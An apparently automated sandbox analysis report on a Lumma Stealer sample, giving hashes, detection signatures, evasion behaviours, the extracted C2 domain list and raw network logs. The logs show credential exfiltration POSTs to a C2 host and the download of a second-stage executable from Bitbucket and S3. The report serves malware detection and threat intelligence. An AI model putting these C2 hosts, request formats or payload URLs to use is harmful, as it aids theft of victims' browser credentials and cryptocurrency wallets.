Windows Analysis Report
jSFUzuYPG9.exe

Overview

General Information

Sample name: jSFUzuYPG9.exe
renamed because original name is a hash value
Original sample name: 820f418e980b172684fe96e4aa6e50a5.exe
Analysis ID: 1579761
MD5: 820f418e980b172684fe96e4aa6e50a5
SHA1: a5498979325229c5494a01fddd7e8013750a5ce7
SHA256: 06472667e63bfd7ffdf64b3de9b839207e2b0ab1ae17d60f6a6ad75d6fbd2800
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

Source: jSFUzuYPG9.exe Avira: detected
Source: jSFUzuYPG9.exe.7428.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "energyaffai.lat", "discokeyus.lat", "aspecteirs.lat", "crosshuaht.lat", "sweepyribs.lat", "sustainskelet.lat", "grannyejh.lat", "necklacebudi.lat"], "Build id": "LOGS11--LiveTraffic"}
Source: jSFUzuYPG9.exe ReversingLabs: Detection: 63%
Source: jSFUzuYPG9.exe Virustotal: Detection: 50%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: jSFUzuYPG9.exe Joe Sandbox ML: detected
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: rapeflowwj.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: crosshuaht.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: sustainskelet.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: aspecteirs.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: energyaffai.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: necklacebudi.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: discokeyus.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: grannyejh.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: sweepyribs.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String decryptor: LOGS11--LiveTraffic
Source: jSFUzuYPG9.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.11:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.11:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.216.152.124:443 -> 192.168.2.11:49777 version: TLS 1.2
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: number of queries: 1001

Networking

Source: Network traffic Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.11:63590 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.11:60253 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.11:65433 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.11:51180 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.11:60277 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.11:58057 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.11:55218 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.11:50665 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.11:54667 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.11:49709 -> 23.55.153.106:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:49721 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49767 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49715 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49715 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49721 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:49733 -> 104.21.66.86:443
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: sweepyribs.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Joe Sandbox View IP Address: 104.21.66.86
Source: Joe Sandbox View IP Address: 23.55.153.106
Source: Joe Sandbox View IP Address: 185.166.143.49
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49715 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49733 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49709 -> 23.55.153.106:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49721 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49748 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49772 -> 185.166.143.49:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49727 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49739 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49755 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49767 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49777 -> 52.216.152.124:443
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HHOEN70NKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12799Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G0ZRODU1MVEYOKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15041Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VSKU0NU9BAG1J2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20410Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FFVY7DHX236User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1209Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2LZ5UATFIAIX09User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588109Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIZ7XL2U7&Signature=FCPVgbdRXx%2FDjhvQvPzU1dQ3dNE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQDOJENS5X8jDlzsJxuPb2pH5MjLxA952GUpuJ9K8c8eAgIgeBp5O3n2dCArHo7VZBQEhKa5Ybqf7xD1F%2BZzGAepczwqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDIf5Q5o38rOF7VorZiqEApSlSAviV7fqKWYqWG4d0%2BlfrC%2FFb7F%2Fc2GVH68DYRo2vd%2BAREXXJpsY5s%2BmBpFXzm6fy26oRa5GS8wZd9Nc0FYJUoSZjhvzo%2FM%2FM6PUw%2FINg1gRCi7PRFdMEoNyTOkNSC2S8%2FTK1pGG4o8hZEeM8vyBsvr0QE%2FuOcUu5JrCscWEP%2BFIPyeSmLpATVuvDiwsooP38cS3cC5Mhjir0zJP2xZUtK%2BDRPz%2BgACYHXpemn2WCxpgImxr6YWsOyoQOhLS0ii2eBVVjZpJNT1ozD%2FkBPjRAjUAEFa5C8b6hC%2FuETQ%2BEKayEkNgfTaLoNER0YYk%2BLdQYmqD3E5OEWQc3mClPsl8QceiMMSmpLsGOp0BepAG7qOdA1hoVp77QSvDNIy85cM9X4QKinihkh90Gdln%2FwS%2BMi4ynXs5fFObnXard%2B5fkTffWOZz4AAnQ1g4%2FaEEJTRdstxSXhoxukE9KAy%2Fq7WmNCu9sA6P5tOZSc7t6W8LRba2NCA3DkwySsQ7mbpcH%2Fh%2BHvf17xRCK7I%2BtWG4OCa%2FkKK4HempfXWhoX%2BEE2qBiW2nLYzf0Zo0QQ%3D%3D&Expires=1734941260 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: .fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https: equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Per equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: p.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https:// equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: lev-tolstoi.com
Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: global traffic DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: jSFUzuYPG9.exe, 00000000.00000002.1979443513.00000000064D9000.00000002.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1649934312.0000000005EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.5.dr String found in binary or memory: http://upx.sf.net
